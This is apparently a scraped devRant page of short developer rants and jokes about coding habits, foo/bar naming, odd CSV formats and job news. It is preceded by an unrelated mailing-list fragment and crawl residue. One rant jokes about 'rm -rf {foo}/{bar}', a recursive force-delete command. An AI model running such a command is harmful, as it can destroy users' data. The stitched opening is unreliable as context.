CObject, CString, CList, CTable, CResource, CRepresentation, CConnector, CStream, CRequest, CResponse, CComponent, CFilter, CProxy, etc. Add a handful of sample apps to a class framework like this and you've got a nice simple way to communicate the essence of the RESTful style. -Philip Your message has been successfully submitted and would be delivered to recipients shortly.
https://groups.yahoo.com/neo/groups/rest-discuss/conversations/topics/1694?xm=1&o=1&m=p&tidx=1
CC-MAIN-2015-11
refinedweb
904
64.51
This article will show you how to create windows GUI with python’s tkinter module. It is very easy to create a pop up window with tk module. First start up your NetBeans IDE, then create a new project as I have shown you before in my previous article. Next enter below script into the NetBeans code editor and run it! import tkinter as tk win = tk.Tk() # create tk instance win.title("tkinter GUI") # add a title win.mainloop() # start the GUI Basically the above python script will create an empty window with the tkinter module then start the window’s event loop by calling the mainloop method from the tk’s class instance as shown in the following graphic.
http://gamingdirectional.com/blog/2016/07/25/how-to-create-windows-graphic-user-interface-with-tkinter/
CC-MAIN-2018-22
refinedweb
121
65.42
How do we try use it? import com.databricks.dbutils_v1.DBUtilsHolder.dbutils class Job { // business logic .. val jobResult: String = ??? dbutils.notebook.exit(jobResult) } When we package the code into a jar we get: [error] missing or invalid dependency detected while loading class file 'NotebookUtils.class'. [error] Could not access term common in package com.databricks.backend, [error] because it (or its dependencies) are missing. Check your build definition for [error] missing or conflicting dependencies. (Re-run with `-Ylog-classpath` to see the problematic classpath.) [error] A full rebuild may help if 'NotebookUtils.class' was compiled against an incompatible version of com.databricks.backend. [error] one error found [error] (compile:compileIncremental) Compilation failed notebook stops tracking job while the job is still running on the cluster 1 Answer Getting java.lang.NullPointerException when trying to mount azure blob storage. 0 Answers Notebook failing only on the first run 2 Answers Can you Query Azure Databricks outside of Notebooks? 0 Answers Running notebook task with parameters using API 0 Answers Databricks Inc. 160 Spear Street, 13th Floor San Francisco, CA 94105 info@databricks.com 1-866-330-0121
https://forums.databricks.com/questions/14129/how-use-dbutils-api.html
CC-MAIN-2018-22
refinedweb
186
51.95
FAQs Search Recent Topics Flagged Topics Hot Topics Best Topics Register / Login Win a copy of Spark in Action this week in the Open Source Projects forum! Marty Groban Greenhorn 4 2 Threads 0 Cows since Jun 25, 2011 (2/10) Number Likes Received (0/3) Number Likes Granted (0/3) Set bumper stickers in profile (0/1) Set signature in profile Set a watch on a thread Save thread as a bookmark Create a post with an image (0/1) Recent posts by Marty Groban Advice building my GUI JTree isnt what im looking for. I need to draw a binary search tree as in Graph theory. I suppose JTree would work, but im only going to do that as a last resort. I still have time to figure out how to draw an actual BST. show more 9 years ago Swing / AWT / SWT Advice building my GUI I am working on a project for an online class I made the mistake of taking this summer and I need to build a gui to show how the huffman code algorithm works. The algorithm part is easy, its not very complicated. However im unsure what the best way to draw the tree(forrest) at each step. It would have to start out as just n nodes (with chars in them) on the screen and then you would press a "next" button and it would pick the two lowest nodes weighted (based on character frequency) characters and make them children of a new node (with just a weight - no char) and then update the screen/panel. I have made swing gui before, my skills are nothing special but I know my way around. However im stuck on this implementation. I have a couple hundred lines of code written right now, but it doesnt work and I think its bad anyway, so I want to "start over" and plan it out better. So Id just like some advice on the data structure to keep track of the nodes and how to draw them on the screen. I was using an ArrayList of JPanels as nodes and trying to draw them to a null layout. Im sure this is awful and id like to know a better way. show more 9 years ago Swing / AWT / SWT Best Data Structure to solve this problem I would try to use a doubly linked list. show more 9 years ago Java in General hashing/bloom filter troubles Here is this assignment I have to do for school. I have to use this bloom filter code and store 'a' to 'z' and 'Z' to 'A' (im good on that). then I have to check for false positives using "aa" to "zz" and "AA" to "ZZ" (not good on that). Here is my code so far. Also, I realize you can't do what I did at the end there with the string loop, I just have that there to try and illustrate what I mean. That may or may not help. import java.util.Arrays; public class BloomFilter { static final int M=512; static final int f1(int x) { return (x^1)%M; } static final int f2(int x) { return ((x^2)+50)%M; } static final int f3(int x) { return ((x^3)+100)%M; } public static void main(String[] args) { int b[]=new int[M]; for (char i='a'; i<='z'; i++) { b[f1(i)]=1; b[f2(i)]=1; b[f3(i)]=1; } for (char i='A'; i<='Z'; i++) { b[f1(i)]=1; b[f2(i)]=1; b[f3(i)]=1; } System.out.println(Arrays.toString(b)); int n=0; //test for false positives for (String s="aa"; s<="ZZ"; s++) if (b[f1(s)]+b[f1(s)]+b[f1(s)]==3) System.out.print(i+"/"+ ++n+" "); } } What I need to know is how I am supposed to use aa to ZZ and check for false positives. I swear this is what the requirements say exactly, I just have no idea how to go about doing it. Also, suggestions on my hash functions would be appreciated as well. show more 9 years ago Java in General
https://www.coderanch.com/u/248595/Marty-Groban
CC-MAIN-2020-34
refinedweb
692
74.22
K-Folds cross-validator¶ K-Folds cross-validator provides train/test indices to split data in train/test sets. Split dataset into k consecutive folds (without shuffling by default). Each fold is then used once as a validation while the k - 1 remaining folds form the training set. from miml.model_selection import KFold X = np.array([[1, 2], [3, 4], [1, 2], [3, 4]]) y = np.array([1, 2, 3, 4]) kf = KFold(n_splits=2) kf.get_n_splits(X) print(kf) for train_index, test_index in kf.split(X): print("TRAIN:", train_index, "TEST:", test_index) X_train, X_test = X[train_index], X[test_index] y_train, y_test = y[train_index], y[test_index] >>> run script... Base cross validation class ('TRAIN:', array([2, 3]), 'TEST:', array([0, 1])) ('TRAIN:', array([0, 1]), 'TEST:', array([2, 3]))
http://meteothink.org/examples/miml/model_selection/kfold.html
CC-MAIN-2020-34
refinedweb
126
60.31
Platform detection no longer works in 0.15 (import { Platform } from 'quasar') Hi, I just upgraded to Quasar 0.15, and I found that my page does not render and throws the following error in the console: TypeError: __WEBPACK_IMPORTED_MODULE_2_quasar__.b.is is undefined I tracked it to the if (Platform.is.cordova)line, which worked fine before the upgrade. But now when I import { Platform } from 'quasar', the Platformobject looks as follows (as found out with console.log): __installed: false install: install() length: 1 name: "install" __proto__: function () __proto__: Object { … } i.e. it doesn’t really look like much. Am I doing something wrong? This part of the docs () has stayed the same even for the 0.15 version. Thanks! This post is deleted!
http://forum.quasar-framework.org/topic/1837/platform-detection-no-longer-works-in-0-15-import-platform-from-quasar
CC-MAIN-2018-13
refinedweb
124
69.48
If you’re an aspiring programmer, it can be hard to choose where to start. There is an incredibly vast number of programming languages you could learn, but which ones among C#, C++, and C will be the most useful? You’ve probably heard of the three variations of the C programming language. Before you choose one to learn, though, you need to understand the differences between C#, C++, and C. What is C? Photo credit to Aptech Malviya Nagar. Despite being published 40 years ago, C is still the most widely used programming language of all time. Programmers still use it in operating systems, kernel-level software, hardware drivers, and applications that need to work with older code. Most old-school programmers will suggest that C is the best programming language to start with because so many newer languages build off of it. It may also offer some security benefits because of its age. The pool of people using it is smaller, making it a less desirable target for hackers. What is C++?. It’s a lot easier to understand C++ if you already have a solid foundation in the C programming language; however, you can still learn C++ as your first language if you want to jump right into object-oriented programming. What is C#?. C# typically sees use in internal or enterprise applications, rather than commercial software. It’s found in client and server development in the .NET framework. While C# is the most technically complicated of the three languages, its syntax is less error-prone than C or C++ and can be learned relatively quickly. Major Differences C and C++ are remarkably similar programming languages, though there are still plenty of differences. C#, on the other hand, has more in common with languages like Java. Here’s an easy guide to understanding the differences between C#, C++, and C. C vs. C++ To fully comprehend the differences between C and C++, you need an understanding of what object-oriented programming is. The term object-oriented, as it relates to programming, originated at MIT in the late 50s or early 60s. Object-oriented programming (or OOP) uses a concept called “objects.” An object is an instance of a “class,” or a program-code-template. A class can be made up of data or code procedures (also known as methods). The original C programming language is not object-oriented, which is the most significant difference between the two. C is what’s called a “procedural” programming language, while C++ is a hybrid language that’s a combination of procedural and object-oriented. There are other key differences between C and C++. - C++ was built as an extension of C, which means it can run most C code. The reverse isn’t true though—C can’t run C++ code. - As an object-oriented language, C++ supports polymorphism, encapsulation, and inheritance, while C does not. - In C, data and functions are “free entities,” which means you can manipulate them with outside code. Since C++ encapsulates data and functions together into a single object, those data structures and operators are hidden to outside code. - C++ uses the namespace, which organizes code into logical groups and to prevent name collisions. Name collisions can occur when your code base includes multiple libraries. C does not use a namespace. - C uses functions for input and output, whereas C++ uses objects for input and output. - C++ supports reference variables, which C does not. A reference variable is an alias for an already existing variable, used to create a short-hand notation for faster coding. - C does not provide error or exception handling, but C++ does. Photo credit to Universal Class C++ vs. C#+ As a much more modern programming language, C# was designed to work with the current Microsoft .NET framework in both client and web-based applications. While C++ is an object-oriented language, C# is considered a component-oriented programming language. Object-oriented programming concentrates on the associations between classes that link together into a big binary executable, while component-oriented programming uses exchangeable code modules that work on their own and don’t need you to know their inner workings to use them. Here are some other major differences between C++ and C#. - C++ compiles into machine code, while C# compiles to CLR, which is interpreted by ASP.NET. - C++ requires you to handle memory manually, but C# runs in a virtual machine which can automatically handle memory management. - C# does not use pointers, while C++ can use pointers anywhere. - C++ can be used on any platform, though it was originally designed for Unix-based systems. C# is standardized but is rarely used outside of Windows environments. - C++ can create stand-alone and console applications. C# can create a console, Windows, ASP.NET, and mobile applications, but cannot create stand-alone apps. C vs. C# While C and C# are technically related to each other, they’re enormously different languages, so there are more differences than similarities between them. Having a background in C can be useful for learning C# because some of the syntaxes are similar; however, C#’s syntax is so forgiving that you could easily learn it without knowing C at all. Which Language Should You Learn First? Now that you have a clear understanding of the differences between C#, C++, and C, how do you choose which one to learn first? New Programmers Photo credit to Bellevue College If you’ve never learned how to program before, many computer science experts would recommend learning C first. Not only is a simpler language which fewer options than its successors, but many other languages use syntax and concepts introduced by C. That means you’ll have an easier time understanding other languages after learning C. Intermediate Programmers If you’re already familiar with some programming concepts and you’ve learned to code in some other languages already, you may want to start with C++ instead. Object-oriented programming languages are much more common nowadays than procedural languages, and if you’ve already got some experience in OOP, you’ll find C++ easier to learn. Advanced Programmers If you have already learned multiple programming languages and you’re trying to increase your skill level, then your choice of the three C languages will depend on what you’re hoping to gain from the experience. Some younger programmers choose to study C as a way to learn the basics of coding. Veteran programmers tend to look down on the younger generation for not respecting their roots, so knowledge of C can work as a sort of street cred at a new job. C++ is still very widely used in the workplace, and knowing how to code in it can open up all sorts of job opportunities. If you’ve already spent time working with object-oriented languages, and you’re looking for another language to add to your resume with minimal effort, C++ is a great choice for that. If your primary desire is to get into .NET and web-based development, C# might be your best option. While it doesn’t get used as frequently as the other two languages, it’s still in high demand in enterprise-level development teams. Photo credit to Webstorm IDE Conclusion Understanding the differences between C#, C++, and C will make it much easier for you to choose which languages to focus on. All of them have their own advantages and disadvantages, and none of them would be a waste of time to learn. The choice is yours!
https://csharp-station.com/understanding-the-differences-between-c-c-and-c/
CC-MAIN-2021-31
refinedweb
1,264
54.83
Ranges in Groovy are lists containing sequential values. A range is of type Range (from Java) and extends java.util.List. As an example, consider a demographic range for a target radio audience for ages 18 to 30. The values stored in this list would be 18,19, 20 and so on up to and including 30. We will explore this scenario in the example below. To learn how to use ranges in Groovy follow these 3 steps: def targetAudienceAges = 18..30 def sampleAge=27 println "$targetAudienceAges" println "First age in range: ${targetAudienceAges.from}" println "Last age in range: ${targetAudienceAges.to}" if (sampleAge ≥ targetAudienceAges.from && sampleAge < targetAudienceAges.to) { println "Sample age is within target audience range" } else { println "Sample age is not within target audience range" } println "Here are the ages in the list:" for (int age : targetAudienceAges) { print "$age " } tragetAudienceAgesand contains the integers 18 up to 30. Note the fromproperty that gives us access to the first number in the range. The toproperty references the last number in the range. We can verify a given integer, e.g., sampleAge, is present in the range by applying and ifstatement as shown in the source code. The program then prints out each age in the list. Use.
https://www.webucator.com/how-to/how-use-ranges-groovy.cfm
CC-MAIN-2018-09
refinedweb
206
67.45
Jenkins only provides the current revision in the environment variable $SVN_REVISION. Of course Jenkins knows the information about changed files of each build as it is shown in the build status page. I guess a plugin would be able to access the model, but that is too much work. Fortunately the Jenkins Groovy plugin allows scripts to run under the system context having access to hudson.model.Buildand other classes. The Groovy programming language is a dynamic language which runs on the JVM. It integrates smoothly with any Java program and is the first choice for scripting Java applications. While not strictly necessary I recommend downloading the SDK's zip and unpacking it on the host where you run Jenkins, usually into the folder where you keep your development tools. For testing and debugging I also install it on my local workstation (in the same location). Groovy in Jenkins Next comes the Jenkins Groovy plugin. Open Jenkins in the browser and navigate the menus: - Manage Jenkins - Manage Plugins - select tab Available - filter "groovy" - select Groovy - Install - Manage Jenkins - Global Tool Configuration - go to section Groovy - Add Groovy: Give it a name and set GROOVY_HOMEto the folder you unpacked it, e.g. /tools/groovy-2.4.11. - deselect Install automatically - Save Run a Groovy script in the build Now let's use a Groovy script in the project. On the project page, - Configure - go to section Build - Add build step - select Execute system Groovy script - paste Groovy code into the script console - Save Debugging the Script Of course it does not work. How can I debug this? Can I print something to the console? Groovy's println "Hello"does not show up in the build log. Searching again, finally the gist by lyuboraykov shows how to print to the console in system scripts: Jenkins provides the build console as outvariable, out = getBinding().getVariables()['out']which can be used like out.println "Hello". Much better, now I can debug. Let's wrap the out.printlnin a def log(msg)method for later. StackOverflow answer by ChrLipp shows how to get the changed files of the current build: def changedFilesIn(Build build) { build.getChangeSet(). getItems(). collect { logEntry -> logEntry.paths }. flatten(). collect { path -> path.path } }This gets the change set hudson.scm.ChangeLogSet<LogEntry>from the build, gets the SubversionChangeLogSet.LogEntrys from it and collects all the paths in these entries - this is the list of all file paths of all changed items in all commits ( LogEntrys). I guess when another SCM provider is used, another type of ChangeLogSet.LogEntrywill be returned, but I did not test that. To better understand what is going on, I added explicit types in the final Groovy script, which will only work for Subversion projects. Getting all builds since the last successful one I want all changed files from all builds since the last green one because they might not have been processed in previous, failed builds. Again StackOverflow, answer by CaptRespect comes to the rescue: def changedFileSinceLastSuccessfull(Build build) { if (build == null || build.result == Result.SUCCESS) { [] } else { changedFilesIn(build) + changedFileSinceLastSuccessfull(build.getPreviousBuild()) } }In case there is no previous build or it was successful the recursion stops, otherwise we collect changed files of this build and recurse into the past. All Together Let's put it all together, def changedFiles() { def Build build = Thread.currentThread()?.executable changedFileSinceLastSuccessfull(build). unique(). sort() }After collecting all duplicates are removed, as I do not care if a file was changed once or more times, and the list is sorted. In the end the list of changed files is saved as text changed_files.loginto the workspace. (The complete jenkins_list_changed_files.groovyscript is inside the zipped source.) jenkins_list_changed_files.groovy, put that under version control and changed the build definition step to use the script's file name. Next time the build ran, the script file would be executed, or at least so I thought. Script Approvals Unfortunately system Groovy script files do not work as expected because Jenkins runs them in a sandbox. Scripts need certain approvals, see StackOverflow answer by Maarten Kieft. To approve a script's access to sensitive fields or methods navigate to - Manage Jenkins - In-process Script Approval (This is the one but last item in the list.) - Approve jenkins_list_changed_filesneeds a lot of approvals: field hudson.model.Executor executable method groovy.lang.Binding getVariables method hudson.model.AbstractBuild getChangeSet method hudson.model.AbstractBuild getWorkspace method hudson.model.Run getNumber method hudson.model.Run getPreviousBuild method hudson.model.Run getResult method hudson.scm.SubversionChangeLogSet$LogEntry getPaths method java.io.PrintStream println java.lang.String new java.io.File java.lang.String staticMethod java.lang.Thread currentThread staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods flatten java.util.List staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods println java.lang.Object java.lang.Object staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods sort java.util.Collection staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods withWriter java.io.File groovy.lang.ClosureCreating a new java.io.Filemight be a security risk, but even printlnis not allowed. Adding all these approvals is a boring process. The build breaks on each missing one until everything is well. As soon as you have all the approvals, you can copy Jenkins' scriptApproval.xmlfound in JENKINS_HOME(e.g. ~/.jenkins) and store it for later installations. The full scriptApproval.xmlis inside the zipped source. Conclusion Jenkins' Groovy integration is very powerful. System scripts have access to Jenkins' internal model which allows them to query information about build, status, changed files etc. On the other hand, development and debugging is cumbersome and time consuming. IDE support helps a lot. Fortunately StackOverflow knows all the answers! ;-)
http://blog.code-cop.org/2018/07/only-modified-files-in-jenkins.html
CC-MAIN-2020-50
refinedweb
936
60.82
Siebel VB Language Reference > VB Language Reference > This standard VB function returns the internal rate of return for a stream of periodic cash flows. IRR(valuearray( ), guess) valuearray( ) An array containing cash-flow values guess An estimate of the value returned by IRR The internal rate of return for a stream of periodic cash flows. Valuearray( ) must have at least one positive value (representing a receipt) and one negative value (representing a payment). Payments and receipts must be represented in the exact sequence. The value returned by IRR varies with the change in the sequence of cash flows. In general, a guess value of between 0.1 (10 percent) and 0.15 (15 percent) is a reasonable estimate. IRR is an iterative function. It improves a given guess over several iterations until the result is within 0.00001 percent. If it does not converge to a result within 20 iterations, it signals failure. This example calculates an internal rate of return (expressed as an interest rate percentage) for a series of business transactions (income and costs). The first value entered must be a negative amount, or IRR generates an "Illegal Function Call" error. Sub Button_Click Dim cashflows() as Double Dim guess, count as Integer Dim i as Integer Dim intnl as Single Dim msgtext as String guess = .15 count = 2 ReDim cashflows(count + 1) For i = 0 to count-1 cashflows(i) = 3000 Next i intnl = IRR(cashflows(),guess) msgtext = "The IRR for your cash flow amounts is: " msgtext = msgtext & Format(intnl, "Percent")End Sub FV FunctionIPmt FunctionNPV FunctionPmt FunctionPPmt FunctionPV FunctionRate Function
http://docs.oracle.com/cd/B31104_02/books/VBLANG/VBLANGVBLangRef133.html
CC-MAIN-2014-52
refinedweb
263
54.52
Join devRant Pipeless API From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple APILearn More Search - "foo" -!34 - Anybody else here has a coworker who insists on having comments everywhere and writes code like this? // Get foo foo = getFoo(); // Check if foo is greater than bar if (foo > bar) Or is it just me?21 - Void foo() { try { //Try something } catch(exception e) { foo(); } } When I saw this in production I cried a little...9 -15 - That time when you code up something really cool (to you, that is...) and none of your friends understand. Me: "Look at this cool thing!" Them: "Looks like a bunch of numbers." Me: "But they mean foo, bar, and baz!" Them: "Whatever." :(3 - - !rant Thinking about quitting my job and opening a bar named "foo" where the walls have a tapestry of random foo-bar code examples. (Easy conversation starter for programmers)8 - - - - - - First time ranter here.. So I started to work in this big company with allegedly many talented devs. All excited to start and learn a whole bunch of new stuff. There was this dev, with gazillion years of experience. We were working on a similar parts of the code base and he told me I should be reusing his module. I opened the module sources to learn about its internals. Oh boy... To illustrate it best, Let’s say there was a function called foo. It was doing one thing. There was also a function called foo1. Doing almost exactly the same thing. There was also fooA. And I kid you not, there was a fooA1. All of them were doing almost the same thing. Almost all of the functions were documented. The documentation for foo would be: “This does X. I don’t like how it does it, so there is foo1 which is better.” Additionally, only 1 of the functions was in use... It doesn’t end here. There were functions named like: cdacictad You ask what it means? Well it means “clean directory a copy it’s contents to another directory” of course... Months later he is no longer with us. I deleted this module. PS Glad to be here ;)16 - How i used to toggle a boolean: foo ? false : true; How i decided to toggle a boolean last night: foo = !foo I wondered why i only just thought of that.18 - - - *Doesn't have Internet and bored as hell* *Starts to program something random with Python* *Wants to write something to a file, doesn't know how* *Intuition starts...* "foo = open('test.txt', 'w') foo.write('hello\n') foo.close()" *Runs program* *It actually fucking worked* Tell me something more simpler than Python.15 - - - - - “Never,never, never, NEVER eat raw userinput“ Referring to stuff like “insert into foo (bar) values ($_POST[username])“4 - So my boss copied a code from stackoverflow and thought "foo" was a function or something... It was just an alias to a SQL select...2 - I'm planning on making a band called Bar Fighters and will play songs like Integer Or Long, The Renderer, Test of U nit, Learn to Try ( catch )5 - - For a developers ranting social media platforms, it sure seems strange that we can't format code snippets... 🤔 At least something like `foo(bar){}` would be awesome!3 - - there are three kinds of programmers foo () { // those who use this } foo () { // those who do this } for () { } // and theres this16 - Does anyone else really dislike "foo", "bar" and "baz"? Because fuck me I do. My brain can't process that stuff, I need some actual real world context. or, maybe i'm just dumb.8 - - - Oauth2 examples. Seriously all examples I found use library that use library that use library to just build url encoded parameters like this client_secret=foo&code=bar Got me 5 hours to dig going trough couple of github repos with implementation to see that shit at the end. Seriously people !!! Start thinking before you write single line. I don’t want to download 10 dependencies and 100MB+ just to send 2 requests with url encoded parameters. It’s in every - literally every language. I know you’re stupid but please just try to understand how things work instead of copy paste another stackoverflow and medium snippet.4 - - - - One of our devs seems to love "attribution" comments in anything he writes. private void foo() { //Author: John Cribbins ...public static final int FOO_BAR = 21; //Author: John Cribbins I mean, I get it for an author tag at the top of a file, but certainly not on every field or method. Is this some kind of weird thing newer devs are encouraged to do these days?!10 - - A recipe for COMPLETELY hacking me off - ask for help, pretend my advice is bollocks, then rephrase it as your own and follow it up with a smart arse comment. "Almond, could you lend me a hand with this regex? I'm trying to match this particular group, but only if it doesn't have 'foo' after it." "Sure, take a look at negative lookaheads - that sounds like it's exactly what you need" "Nah that won't work for me, because I need to check for more than one character after it, I need to check for 'foo'" "What? That doesn't make sense, you can..." "Ah don't worry, I've found the answer by myself now, I can actually just add '?!' before the text I don't want to match and it'll do it - I'm fast becoming a regex expert here! Let me know if you want me to explain this to you" DAHHHHHHH THAT IS A NEGATIVE LOOKAHEAD YOU CRETIN3 - - So I finished uni three weeks ago. Interview for a my first junior web developer position a week ago. Received news yesterday that I got the job. It’s been a good couple weeks I’d say.3 - When you go make coffee and return to your code and see let foo = and you have no idea wtf was going to come next...4 - - Huh. ES6's variable destructuting on objects is actually pretty cool. var {foo, bar, baz} = obj Is functionally equivalent to this: var foo = obj.foo var bar = obj.bar var baz = obj.baz I like it! Makes things simpler.3 - - you know you should go home when you write "public private foo()". it's public ... but private ... but still public I'M DONE FOR THE DAY5 - - - - What my IDE says: "Method 'foo' is too complex to analyze by data flow algorithm". What it means: "Your code is shit and I just give up at trying to understand it" - - I've got a puzzle! How well do you know the weird GNU coreutils error messages? $ rm foo/ rm: cannot remove 'foo/': Is a directory $ rm -r foo/ rm: cannot remove 'foo/': Not a directory What am I?7 - - I swear to god you'll never feel more epic while coding than when you listen to the dovahkiin song.3 - - Master Foo and the Script Kiddie (from the Rootless Root Unix Koans of Master Foo).2 - God, Allman indentation style is such pain... God bless K&R... For those who don't know, Allman is this: void foo(void) { statement; statement; } and K&R is this: void bar(void) { statement; statement; }14 - "Hello, the drive of your XYZ server is getting full, would it be possible to prune some of the unused and/or old docker images and layers there please? Alternatively, we can offer to replace the drives with a higher capacity models for FOO extra per month" "Hello, the disk use keeps growing and has reached the 95% mark, please prune some of your images to make space for new. If you wanted to choose the alternate option of disk capacity increase, we would have to do that as soon as possible, otherwise you may run out of space before the RAID array rebuilds" "Hello, your server XYZ has completely ran out of disk space. Any changes that would require data being saved on disk may and probably will fail. Please free some space as soon as possible" Ugh, I hate clients that just don't cooperate until shit hits the fan... And no, we could not prune the space ourselves, its not our data to delete whenever we think it necessary. We merely manage the machine's operation, keeping it online and its services running - Find the odd one out : a) const int * foo b) int const * foo c) const * int foo d) int * const foo7 - - Boss: I want feature foo! Me: that will be a bit tricky because bar... Boss: It's easy, you just baz! Me: ok boss :) *hax around bar - A piece of code someone just pushed: In pseudocode ------------------------ Function foo() Result = GetFoo() If result != null DoStuff() Return result Else Result = null -------------------------- Ffs. It's written in a strongly typed language, and the whole function is in a try with an empty catch and inside yet another try with an empty catch. Guess he wanted to be sure no error got away.... Oh, and he has 9 years of experience, and since all paths don't return something it does not compile12 - - - My favorite command of day is 😂 rm -rf {foo}/{bar} Reference if you don't know what happened today: - Am I the only one who doesn't know where foo bar came from? I see it all the time but have no clue :/3 - Metasyntactic variables, you use them, but do you know their origin? This should be essential programmers knowledge: - - - - did not expect the stickers would actually arrive! you sent it all the way half of the earth. the stickers earn a deservedly special space on my laptop and phone. Kudos to you devRant!2 - When coworkers leave the co. for a better paying job and leave this kind of code after themselves: int foo = 1; String.format("blabla %s", Integer.toString(foo)); fml6 - - Alright since I have to deal with this shit in my part time job I really have to ask. What is the WORST form of abusing CSV you have ever witnessed? I for one have to deal with something like this: foo,1,2,3,4,5 0,2,4,3,2,1 0,5,6,4,3,1 bar,,,,, foobar,,,,, foo can either be foo, or a numeric value if it is foo, the first number after the foo dictates how many times the content between this foo and the next bar is going to be repeated. Mind you, this can be nested: foo,1,,,, 1,2,3,4,5,6 foo,10,,,, 6,5,4,3,2,1, bar,,,,, 1,2,3,4,5,6 bar,,,,, foobar,,,,, foobar means the file ends. Now since this isn't quite enough, there's also SIX DIFFERENT FLAVOURS OF THIS FILE. Each of them having different columns. I really need to know - is it me, or is this format simply utterly stupid? I was always taught (and fuck, we always did it this way) that CSV was simply a means to store flat and simple data. Meanwhile when I explain my struggle I get a shrug and "Just parse it, its just csv!!" To top it off, I can not use the flavours of these files interchangably. Each and everyone of them contains different data so I essentially have to parse the same crap in different ways. OK this really needed to get outta the system7 - - - - How many devs here got hired through Google's Foo Bar challenge or got the invitation? I got the invite and have sent my assignments for review. Anyone know what happens next.20 - Reporting is not fun.. Scenario 1: * A user says they need to export certain data from our system.. * Developer W makes report called "Foo detail report" Scenario 2: * A user says they need this report to also show some extra fields * Developer X makes a new report called "Foo detail report (extra fields)" Scenario 3: * A user says they need this report to be run with a different search criteria * Developer Y makes a new report called "Foo detail report (extra fields) by bar" Scenario 4: * A user says they need this report show data grouped in a different way * Developer Z makes a new report called "Foo detail report (extra fields) by bar- new grouping" The above scenarios happened over and over for several years in no particular order... Current Day: * Some users have certain reports they use and rely on but we don't know which ones * Nobody really knows what all of the reports do or what is the difference between them without looking at the sql * If we want to change data structures we have many reports to update * I have a request from a user to add an extra column to one of the reports1 - Laravels error reporting is sometimes fucking useless. Yesterday it wrote into the logs "class foo doesn't exist". I triple checked the including of this class. Checked the namespaces. Checked the classnames. Everything was ok. Today I removed the content of this particular class, which returned an array. And the error was gone... After further search I realized I was missing commas within the array deceleration... Why the fuck you don't just tell me this????!?4 - There should be a post type “facts” || “dev hints” || something like that where we can post cool stuff we figured out.. Like how to replaceAll in JS? “Hello ranters”.split(“e”).join(“foo”); JS devs probably know this but I didn’t, so yeah..3 - Just got off the phone with a csr about a bug they found. No biggie, I said I'd fix it. Basically until it gets fixed I told them that when they do their process to make sure to do "foo" first, then "bar" second. As soon as I got off the phone, had to poop so I went to the bathroom, and as soon as I sat down I get a message from the same CSR, "Hey I did bar first, can I type foo then bar again?" WTF DID I JUST SAY LITERALLY 2 MINUTES AGO ON THE PHONE. TBH IT WOULD BE BETTER IF YOU JUST DIDNT DO ANYTHING FOR 15 MINUTES BUT NOW I HAVE TO COMB CLOUD FUNCTION LOGS, FIND THE DOC UID YOU CREATED, FIND THE DOC YOU MADE, DELETE IT, DELETE THE ASSIGNMENT IN YOUR TRASH ASS WORKPLACE PORTAL, AND STILL FIX THE SAID BUG4 - -?7 - - - -?18 - Quickly coming to the terms with the fact that software development inside companies is just the perpetual motion of putting out fires as quickly as possible just so customers can still be ignorant cunts. - Still find it amazing how archaic command prompt is, why do we still need to manually select which drive we want before cd'ing into the directory... Why can't we just do cd D:/foo/bar, I understand you want us to use PowerShell Microsoft but you are the company that still ships internet explorer so please at least bring it up to standard a little -,-2 - -?12 - - The document.getElementbyId function . It is so long. Aldo this probably poes not count but the export function does not accespt whitespace before and after the = sign So instead of export PATH = "$PATH:/foo/bar/baz" You need to write export PATH="$PATH:/foo/bar/baz"8 - There's two types of people: if ($foo == $bar) { // Something... } AND if($foo==$bar) { // Something... }11 -. - - Null-propagation operator and null coalesce all in one line makes me tingly. return registryKey.GetValue("foo")?.ToString()??"bar"; - so a colleague of mine, which is fresh out of Uni. as software engineer has no clue of what Foo and Bar stands for...7 - When the previous developer doesn't appear to know what casting is... var foo = Convert.ToBoolean(objDictionary["someKey"].ToString());1 - - CMake. include(<FOO>) has different behaviour if <FOO> is a 'file' or a 'module'. There is no option to include that says if something is a file or a module. How does CMake know if <FOO> is a file or a module? What even is a module anyhow? Who knows? The documentation doesn't! - Approaching the end of my first week as a junior web dev. Spent the week writing automatic web suite tasks for an entire e-commerce platform. Arguable the best way I could have been introduced to the code base 10/10 would recommend. - - Do you prefer? var foo = true; if (some condition){ var foo = false; } Or if (some condition){ var foo = false; } else{ var foo = true; }9 - In one session 36 hours. I lost someone close to me and I kinda didn't leave my office for any form of social interaction for three weeks. - try{ someObject.someAttribute = (int?) reader["columnName"]; }catch{ someObject.someAttribute = null; } Or, same coworker, another piece of code: if(((int?)reader["foo"]).HasValue){ bar = (int?)reader["foo"]; }else{ bar = null; } - Saw this in the Python project codebase today: arg = '\"foo\"' Which is funny, because '\"foo\"' == '"foo"' - How to know if someone is C# ninja? when you read his code you’ll find a lot of Foo<T> , TModel, TKey and a lot of reflection5 - I really want my dev team to ask me to go to happy hour so I can suggest meeting at Foo Bar. Though, that may be why no one's asked. -. - Came to the realisation that I wasted three years in uni, today my final grades were released - for those who give a shit I got a first I was happy till I realised I got my dev position without them even knowing my final grade.3 - Guess I'm getting old (school) outputting foo, bar and baz for testing purpose. Does anyone still using those too?5 - -. - - There are few things I hate more in software development than writing mappings from shitty SOAP apis to JSON.2 - - While everyone is hating proper programming languages... Let's talk about quotes in batch files. What the actual fuck did Bill smoke while developing this boolshit?2 - LPT you can just write debug(foo) and it'll break as soon as chromium debugger hits a foo function call. Undoable by using undebug(foo).2 - EDITOR=nano sudoedit foo Spare me please… It's not that I don't know how to use vim/vi, I'm just lazy to get used to it…2 - Our software outputs some xml and a client has another company loading this xml into some data warehouse and doing reporting on it. The other company are saying we are outputting duplicate records in the data. I look and see something like this: <foo name="test"> <bar value="2" /> <bar value="3" /> </foo> They say there are two foo records with the name test.. We ask them to send the xml file they are looking at. They send an xlsx (Excel!) file which looks like this: name value test 2 test 3 We try asking them how they get xlsx from the xml but they just come back to our client asking to find what we changed because it was working before. Well we didn't change anything. This foo has two bar inside it which is valid data and valid xml. If you cant read xml just say so and we can output another format! - Just learned the "hello world" of foo language. Super cool...let's make some changes: "Foo Programmer and Developer. 23 years of experience, 2 gazillion Foo projects in production" added to bio - Found myself in a career predicament. I’m currently working at a tech startup and it really does have the potential to really take off. But recently the CEO has taken compressed working and remote working off the table for the most part which at this stage in my life is quite important. Today I was offered a position at a different company with 4/5 days a week with a 10% pay increase. Now the time has come to make a decision and I really don’t know what to do because I’m pretty sure the worst thing for me to do is make the wrong choice and 